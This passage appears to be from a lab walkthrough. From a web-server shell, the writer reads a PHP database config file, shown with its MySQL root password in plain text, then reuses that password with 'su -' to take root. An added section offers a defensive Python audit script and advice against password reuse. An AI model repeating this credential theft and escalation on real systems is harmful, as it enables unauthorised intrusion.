DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

The credentials in mysqli_connect.php under /var/www are wrong; the ones in mysqli_connect.php under /var are the correct ones:

www-data@web:/var/www$ cd ..
cd ..
www-data@web:/var$ ls
ls
backups  crash       lib    lock  mail                opt  spool  uploads
cache    index.html  local  log   mysqli_connect.php  run  tmp    www
www-data@web:/var$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
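The two copies of mysqli_connect.php above show the three things a reviewer would flag: the application logs into MySQL as root, the file is readable by the web server account (the shell is only www-data), and a stale copy with a different password was left behind. The following Python is an added example, not from the original post, that walks a tree and reports exactly those issues. The sample tree it builds in a temporary directory mirrors the two files found on the target; the list of web roots and the 644 mode are assumptions.

```python
import os
import re
import stat
import tempfile

# Matches the DEFINE('DB_USER', ...) / DEFINE('DB_PASSWORD', ...) style used in mysqli_connect.php.
DEFINE_RE = re.compile(
    r"""DEFINE\s*\(\s*['"]DB_(USER|PASSWORD)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""",
    re.IGNORECASE,
)


def read_db_constants(path):
    """Return {'DB_USER': ..., 'DB_PASSWORD': ...} for the constants found in a PHP file."""
    with open(path, "r", errors="replace") as fh:
        return {"DB_" + key.upper(): value for key, value in DEFINE_RE.findall(fh.read())}


def audit_db_configs(base_dir, web_roots=("var/www",)):
    """Walk base_dir and report every PHP file carrying a DB password, keyed by
    relative path, with the issues a reviewer would raise. web_roots is assumed."""
    findings = {}
    passwords = set()
    for dirpath, _dirs, files in os.walk(base_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            consts = read_db_constants(path)
            if "DB_PASSWORD" not in consts:
                continue
            rel = os.path.relpath(path, base_dir)
            issues = []
            if os.stat(path).st_mode & stat.S_IROTH:
                issues.append("world-readable")          # any local account can read it
            if consts.get("DB_USER", "").lower() == "root":
                issues.append("db-user-is-root")         # app should use a least-privilege DB user
            if any(rel.startswith(root + os.sep) for root in web_roots):
                issues.append("inside-webroot")          # one misconfiguration away from being served raw
            passwords.add(consts["DB_PASSWORD"])
            findings[rel] = {"db_user": consts.get("DB_USER"), "issues": issues}
    if len(passwords) > 1:
        # Several copies with different passwords: at least one is stale and should be removed.
        for finding in findings.values():
            finding["issues"].append("multiple-password-variants")
    return findings


CONFIG_TEMPLATE = (
    "<?php\n"
    "DEFINE ('DB_USER', 'root');\n"
    "DEFINE ('DB_PASSWORD', '%s');\n"
    "DEFINE ('DB_HOST', 'localhost');\n"
)


def build_sample_tree(base_dir):
    """Constructed layout mirroring the target: a stale copy under the web root and
    the live copy one level above it, both readable by www-data as they were on the box."""
    for rel, password in (("var/www/mysqli_connect.php", "goodday"),
                          ("var/mysqli_connect.php", "root@ISIntS")):
        path = os.path.join(base_dir, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(CONFIG_TEMPLATE % password)
        os.chmod(path, 0o644)  # assumed mode


def run_demo():
    """Build the sample tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return audit_db_configs(tmp)


if __name__ == "__main__":
    for path, finding in run_demo().items():
        print(f"{path}: user={finding['db_user']} issues={', '.join(finding['issues'])}")
```

The worst problem on this box, reusing the MySQL root password as the system root password (the su below), is invisible to a file scanner; it is a policy point: the application gets its own low-privilege database user, and database and OS accounts never share a secret, so a leaked config file stops at the database.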

Log in with the root credentials:

www-data@web:/var$ cd
cd
bash: cd: HOME not set
www-data@web:/var$ su -
su -
Password: root@ISIntS

root@web:~# ls
ls
root@web:~# ls -al
ls -al
total 32
drwx------  4 root root 4096 2011-05-09 19:25 .
drwxr-xr-x 21 root root 4096 2011-05-07 13:37 ..
drwx------  2 root root 4096 2011-05-07 15:12 .aptitude
-rw-r--r--  1 root root  107 2011-05-09 19:29 .bash_history
-rw-r--r--  1 root root 3106 2010-10-21 08:47 .bashrc
drwx------  2 root root 4096 2011-05-07 17:18 .cache
-rw-r--r--  1 root root    0 2011-05-09 19:24 .mysql_history
-rw-r--r--  1 root root  140 2010-10-21 08:47 .profile
-rw-------  1 root root  837 2011-05-09 19:16 .viminfo
root@web:~# whoami
whoami
root
